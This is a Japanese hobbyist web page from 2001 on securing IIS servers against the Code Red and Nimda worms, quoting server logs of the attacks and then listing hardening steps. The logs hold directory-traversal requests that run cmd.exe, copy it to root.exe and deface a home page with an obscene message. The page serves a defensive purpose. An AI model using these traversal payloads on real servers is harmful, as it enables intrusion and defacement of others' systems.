IIS Serverのセキュリティー設定

Since 08/18/2001     Renewal 10/17/2001

1.Code Red の侵入方法
2.Nimda の侵入方法
3.FTP からのWormの侵入方法
4.侵入されないIIS Serverの設定

9/18/2001より現在まで、新種のコンピュータ ウィルス Nimda が日本国内で猛威を振るっています。
これは、01年5月から流行しているCode Redからの派生Wormで、変身する度に強力なアタックを行い
世界中の数十万台のIISサーバーを汚染し、更にはIEの弱点を利用し通常の一般ユーザーPCも
「ホームページを閲覧しただけで感染してしまう」という今までに無い恐怖のどん底に落とし入れています。
Nimda ワームとは、IE および IIS の既知の弱点を利用するワームです。このワームは電子メール
Web ブラウザ、Web サーバー、ファイル共有の 4 つの経路から感染しますが、非常に感染力の高い
Wormに変身しています。
このワームに感染した場合、「多大なトラフィックによるインターネット、および LAN の速度低下 」
「CPU 使用率 100% 」、「コンテンツの改ざん (スクリプトが追加されます) 」、「トロイの木馬の設置」など
パソコンのシステムに非常に深刻なダメージを作り出します。
WWWサーバーだけでなく、FTPサーバーへも同種のアタックが発生しています。

今回、自宅のサーバーが攻撃されたのを機会に、IISサーバーのセキュリティーを見直そうと思い立ち
「IIS Serverのセキュリティー設定」を実施しました。その内容を説明します。
対策後は、WWWサーバー、FTPサーバーを公開していますがWormの攻撃を受けても汚染されることが
なくなりました。

1.Code Red の侵入方法

<Code Redに侵入された時のLog記録より>
W3SVC1 * *.*.*.* 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 0 2199 66 521 HTTP/1.0 - - - -
W3SVC1 * *.*.*.* 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 0 842 70 31 HTTP/1.0 - - - -
W3SVC1 * *.*.*.* 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe
502 0 382 100 121 HTTP/1.0 - - - -
W3SVC1 * *.*.*.* 80 GET /scripts/root.exe/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^
<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>
fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^
<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^
<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>
.././index.asp 502 0 355 423 201 HTTP/1.0 - - - -

(* *.*.*.*は、侵入されたServerのドメイン名とIP)
<実際に侵入され、書き換えられたホームページ例>

2.Nimda の侵入方法

<Nimdaに侵入された時のLog記録より>
W3SVC1 * *.*.*.* 80 GET /default.ida
W3SVC1 * *.*.*.* 80 GET /scripts/root.exe /c+dir 404 3 3387 72 10 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /MSADC/root.exe /c+dir 404 3 3387 70 10 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3387 80 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3387 80 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 96 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 117 20
HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 117 0
HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /msadc/..%5c../..%5c../..%5c/..チⸯ..チⸯ..チⸯwinnt/system32/cmd.exe /c+dir 404 3 3387 145 0
HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..チⸯwinnt/system32/cmd.exe /c+dir 404 3 3387 97 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3387 97 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 3 3387 97 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 3 3387 97 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 98 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 96 0 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3387 100 10 HTTP/1.0 www - - -
W3SVC1 * *.*.*.* 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 3387 96 10 HTTP/1.0 www - - -
(* *.*.*.*は、侵入されたServerのドメイン名とIP)

3.FTP からのWormの侵入方法

<FTP から侵入された時のLog記録より>
MSFTPSVC1 * *.*.*.*21 [19]USER anonymous - 331 0 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]PASS test@micro.org - 230 0 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD / - 550 183 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged - 550 5 0 0 10 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev - 550 3 0 0 10 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/com1+/_ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/com1+/_/0b47e5d5d0b8a6e440ee8747b255822550b479fef7e9d7ad5bb693d94f62388ce53792d916c7645f2d - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/For+DivX+Club - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/For+DivX+Club/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tagged/by/zeev/com1+/For+DivX+Club/com1+/753897671 - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming - 550 5 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by/zeev - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by/zeev/com1+/+ - 550 3 0 0 10 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by/zeev/com1+/For+DivX+Club - 550 3 0 0 10 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by/zeev/com1+/For+DivX+Club/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /incoming/tagged/by/zeev/com1+/For+DivX+Club/com1+/753897671 - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp - 550 5 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by/zeev - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by/zeev/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by/zeev/com1+/For+DivX+Club - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by/zeev/com1+/For+DivX+Club/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /temp/tagged/by/zeev/com1+/For+DivX+Club/com1+/753897671 - 550 3 0 0 10 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp - 550 5 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by/zeev - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by/zeev/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by/zeev/com1+/For+DivX+Club - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by/zeev/com1+/For+DivX+Club/com1+/+ - 550 3 0 0 0 FTP - - - -
MSFTPSVC1 * *.*.*.*21 [19]MKD /tmp/tagged/by/zeev/com1+/For+DivX+Club/com1+/753897671 - 550 3 0 0 0 FTP - - - -
(* *.*.*.*は、侵入されたServerのドメイン名とIP)

4.侵入されないIIS Serverの設定

(1)対策としては、Microsoftから出されているSPパッケージやパッチを入れて処置する。
  サービスパックと修正モジュールを適用する

(2)各ホルダーは、セキュリティ設定でAdministratorsのみフルコントロールとする。
  (使用方法により、\:WinNTをsystemをフル・Usersを読み取り、\:Inetpub下の一部も変更)

(3)/Scriptsや/MSADCから入られるので、「Scripts」「MSADC」のエイリアスを削除する。
  その他、「IISAdmin」「IISSamples」「IISHelp」「_vti_bin」「Printers」のエイリアスを削除する。

(4)../../と親ホルダに移動させない為に、インターネットサービスマネージャにより、IISフォルダ
  全体のプロパティ→編集→ホームディレクトリ→構成→アプリケーションのオプション→「親の
  パスを有効にする」のチェックを外す。

(5)../../や/Scriptsから入れないように、スクリプトフォルダの階層を複雑にする。
  又、/Scriptsの代わりに独自の適当なホルダ名とエイリアスを設定し、これにスクリプトの
  実行アクセス権を設定する。

(6)Code Red,Code RedUでは、Tcp 80ポートの/default.ida というファィルを GETしようとアクセス
  する為、Serverが過剰反応しServerがダウンしたり、IISサービスが停止したりします。
  対策としては、インターネットサービスマネージャにより、IISフォルダー全体のプロパティ→
  編集→ホームディレクトリ→構成→アプリケーションのマッピングより
  Index Server用「.htw, .ida, .idq」と Web-based password reset用「.htr」の
  各スクリプトマッピング拡張子を削除します。
  これ以外に、「.cer、.cdx、.idc、.shtml、.stm、.printer」の各スクリプトマッピング拡張子も
  通常は使わないので削除すると良い。

(7)チャットや掲示板をASPやEXEのスクリプトで運用する場合は、(5)で作成した、スクリプトホルダ
  のセキュリティにUsers変更を追加します。
  又、wwwrootのホルダには、Users読み取りのみ追加して下さい。

(8)ftproot以下のホルダのセキュリティに、Usersを追加すると、そのアクセス許可範囲で
  外から他の人が侵入出来ます。必要の無いものは付加しないよう注意しましょう。

(9)通常は使わないWeb DAV(Distributed Authoring and Versioning) 拡張機能を無効にします。
  \:WinNT\System32\Inetsrvのフォルダにある「Httpext.dll」に対して
  Everyone をアクセス拒否するように、アクセス権を設定すれば Web DAV は無効にできます。

(10)IIS のログファイルを別のドライブに保存する。
  標準設定の場合ログファイルが保存されている場所が決まって入る為、不正アクセスが
  発生した際にログを削除される危険性がある。別ドライブにログファイルを保存するように
  インターネットサービスマネージャのログファイルディレクトリを変更した方が良い。

  参考にした情報 IIS 5.0 セキュリティ対策ハンドブック  
            Nimda ワームに対する防御策の説明


SINCE 08/18/2001
Copyright(C) 2001 artおじさん

◆ 戻る ◆